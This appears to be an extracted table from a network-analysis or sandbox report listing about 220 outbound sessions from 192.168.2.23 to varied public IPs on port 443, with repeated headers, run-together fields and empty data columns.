                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10953192.168.2.2356900156.218.93.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10954192.168.2.2341544211.79.140.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10955192.168.2.23347542.229.134.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10956192.168.2.2344306192.68.57.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10957192.168.2.234492837.119.107.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10958192.168.2.2346116186.190.5.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10959192.168.2.235956084.120.31.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10960192.168.2.2350976115.54.26.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10961192.168.2.2348256185.249.153.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10962192.168.2.2347352126.186.241.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10963192.168.2.235745691.109.198.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10964192.168.2.235075643.4.215.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10965192.168.2.2348310199.213.97.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10966192.168.2.2355438203.68.30.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10967192.168.2.235436072.22.104.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10968192.168.2.235856289.107.20.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10969192.168.2.2344108158.238.7.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10970192.168.2.2338232143.165.101.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10971192.168.2.2353566100.238.123.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10972192.168.2.234619880.15.107.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10973192.168.2.2357958102.169.171.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10974192.168.2.2350972113.107.193.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10975192.168.2.234064099.249.64.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10976192.168.2.234262246.72.60.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10977192.168.2.235004423.111.161.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10978192.168.2.235158080.10.56.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10979192.168.2.235845083.126.31.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10980192.168.2.2337332154.158.101.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10981192.168.2.2345222219.52.15.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10982192.168.2.2334556174.110.5.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10983192.168.2.2349292123.86.172.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10984192.168.2.233992454.76.147.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10985192.168.2.234271474.9.220.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10986192.168.2.2354726175.226.137.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10987192.168.2.2347220223.184.29.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10988192.168.2.2357036192.1.233.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10989192.168.2.235862478.200.194.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10990192.168.2.234468081.156.176.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10991192.168.2.234373669.149.136.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10992192.168.2.2333302132.203.38.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10993192.168.2.2358552141.207.175.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10994192.168.2.2337734130.246.0.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10995192.168.2.236041444.161.83.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10996192.168.2.233349076.97.0.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10997192.168.2.2334940216.2.238.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10998192.168.2.23441344.159.64.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        10999192.168.2.235074679.48.20.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11000192.168.2.2334980113.80.165.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11001192.168.2.23536802.8.98.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11002192.168.2.2352766159.171.122.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11003192.168.2.2339202182.146.249.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11004192.168.2.234502436.176.119.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11005192.168.2.23501765.43.164.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11006192.168.2.234122019.202.36.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11007192.168.2.234988270.158.42.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11008192.168.2.2335784176.197.130.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11009192.168.2.233659461.135.107.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11010192.168.2.233492459.193.100.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11011192.168.2.234372669.57.175.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11012192.168.2.2349446104.89.197.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11013192.168.2.2334694114.212.213.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11014192.168.2.2352170187.73.200.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11015192.168.2.2357172208.185.191.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11016192.168.2.2353678184.180.141.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11017192.168.2.235447242.144.225.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11018192.168.2.233738296.152.203.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11019192.168.2.2342328114.38.221.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11020192.168.2.2335004181.137.151.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11021192.168.2.2335870200.140.146.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11022192.168.2.2356350158.151.164.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11023192.168.2.235001052.247.255.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11024192.168.2.234152677.138.88.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11025192.168.2.233456899.120.235.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11026192.168.2.2334958195.232.143.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11027192.168.2.235865075.222.35.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11028192.168.2.2358950163.52.113.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11029192.168.2.2343542138.189.77.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11030192.168.2.2334896130.252.150.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11031192.168.2.2337846115.70.221.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11032192.168.2.2342214188.163.29.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11033192.168.2.2341444190.142.42.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11034192.168.2.2358672122.126.207.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11035192.168.2.2343508140.127.155.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11036192.168.2.234347453.22.60.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11037192.168.2.2342906133.199.201.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11038192.168.2.2337192142.46.78.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11039192.168.2.2342438136.184.117.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11040192.168.2.234541873.206.114.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11041192.168.2.235059461.60.50.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11042192.168.2.2349046158.214.243.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11043192.168.2.2333104156.188.115.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11044192.168.2.2357796216.101.21.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11045192.168.2.2341636103.219.14.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11046192.168.2.2345122184.219.215.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11047192.168.2.2341184110.249.120.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11048192.168.2.2359942210.161.55.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11049192.168.2.233861619.43.210.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11050192.168.2.2332778222.198.222.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11051192.168.2.235903896.243.17.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11052192.168.2.2337826177.241.125.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11053192.168.2.2336316113.103.44.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11054192.168.2.234083273.183.180.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11055192.168.2.235702014.180.131.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11056192.168.2.2332792139.46.63.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11057192.168.2.2342300181.74.52.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11058192.168.2.2359450118.123.146.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11059192.168.2.2335050196.41.226.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11060192.168.2.2335442213.105.213.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11061192.168.2.2348716144.198.237.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11062192.168.2.235378274.91.170.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11063192.168.2.2340584203.87.215.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11064192.168.2.2344076164.203.216.251443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11065192.168.2.23514564.104.177.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11066192.168.2.2343630141.93.230.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11067192.168.2.2348890219.173.195.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11068192.168.2.235986099.157.133.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11069192.168.2.2337854150.201.71.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11070192.168.2.2357180151.237.14.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11071192.168.2.2341072202.8.166.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11072192.168.2.2342040156.129.200.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11073192.168.2.2356264142.49.72.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11074192.168.2.2336776117.56.152.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11075192.168.2.235442073.239.23.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11076192.168.2.2338336103.33.37.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11077192.168.2.2350660140.126.168.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11078192.168.2.2357420188.6.227.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11079192.168.2.2333734207.214.130.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11080192.168.2.234656837.227.235.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11081192.168.2.234042286.100.191.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11082192.168.2.234192072.99.116.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11083192.168.2.2350376168.155.201.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11084192.168.2.2339334194.207.43.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11085192.168.2.2356784190.174.29.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11086192.168.2.2351368212.71.54.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11087192.168.2.235904450.163.181.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11088192.168.2.2350428181.249.98.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11089192.168.2.2344410124.128.143.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11090192.168.2.234622289.149.46.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11091192.168.2.2356946108.217.92.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11092192.168.2.2355672206.118.107.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11093192.168.2.235036813.80.214.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11094192.168.2.2351610199.73.5.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11095192.168.2.2358818162.194.208.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11096192.168.2.2354402104.117.129.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11097192.168.2.234873887.72.246.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11098192.168.2.2346380100.138.37.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11099192.168.2.2344930165.166.229.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11100192.168.2.233404063.233.63.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11101192.168.2.2338030185.113.22.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11102192.168.2.2347368190.253.157.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11103192.168.2.2355830107.210.119.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11104192.168.2.235794289.215.139.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11105192.168.2.2346560152.196.58.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11106192.168.2.2360306138.241.76.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11107192.168.2.234360838.158.184.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11108192.168.2.2343264173.208.188.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11109192.168.2.2343594112.165.77.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11110192.168.2.2339444219.103.97.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11111192.168.2.23561129.124.134.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11112192.168.2.233315890.88.183.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11113192.168.2.236029849.104.174.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11114192.168.2.2356670103.74.219.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11115192.168.2.2357772105.124.5.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11116192.168.2.2345218137.98.71.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11117192.168.2.2343232132.183.92.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11118192.168.2.2358466179.133.177.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11119192.168.2.2352322181.21.218.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11120192.168.2.233779874.61.72.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11121192.168.2.2333720216.212.2.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11122192.168.2.234610820.57.11.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11123192.168.2.2341966119.56.191.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11124192.168.2.2355370151.82.165.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11125192.168.2.235073293.160.158.47443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11126192.168.2.2355084155.162.38.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11127192.168.2.2340370222.246.219.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11128192.168.2.2359734183.9.47.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11129192.168.2.234064276.142.198.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11130192.168.2.234521632.107.171.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11131192.168.2.2358810130.8.90.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11132192.168.2.2349026112.4.145.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11133192.168.2.23582521.251.181.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11134192.168.2.235721038.184.113.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11135192.168.2.23543322.13.225.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11136192.168.2.234823877.251.133.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11137192.168.2.233838667.90.153.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11138192.168.2.2358934218.137.191.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11139192.168.2.2352312209.149.174.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11140192.168.2.2341780125.219.238.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11141192.168.2.233651250.74.163.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11142192.168.2.2358916188.177.148.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11143192.168.2.235873857.102.247.42443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11144192.168.2.2351402100.164.35.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11145192.168.2.235689640.198.21.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11146192.168.2.2355710133.66.238.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11147192.168.2.2342852216.75.183.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11148192.168.2.2345438141.234.9.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11149192.168.2.234337884.70.20.128443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11150192.168.2.2350954200.104.35.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11151192.168.2.2334440116.12.249.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11152192.168.2.2337464151.68.101.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11153192.168.2.2358600159.170.103.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11154192.168.2.2344532162.131.120.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11155192.168.2.2356876200.180.196.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11156192.168.2.2340206149.146.67.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11157192.168.2.2336044139.228.230.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11158192.168.2.2355534209.167.189.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11159192.168.2.2358356162.241.216.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11160192.168.2.2346262185.4.232.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11161192.168.2.234014662.218.152.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11162192.168.2.233860437.164.177.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11163192.168.2.2338250203.244.127.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11164192.168.2.235411874.112.145.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11165192.168.2.2352430157.220.209.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11166192.168.2.23468402.182.162.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11167192.168.2.236014095.119.136.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11168192.168.2.2350310132.148.67.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11169192.168.2.2355902158.79.112.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11170192.168.2.2345242221.13.243.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11171192.168.2.2336248143.127.86.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11172192.168.2.235191827.226.208.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        11173192.168.2.2338718157.146.127.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
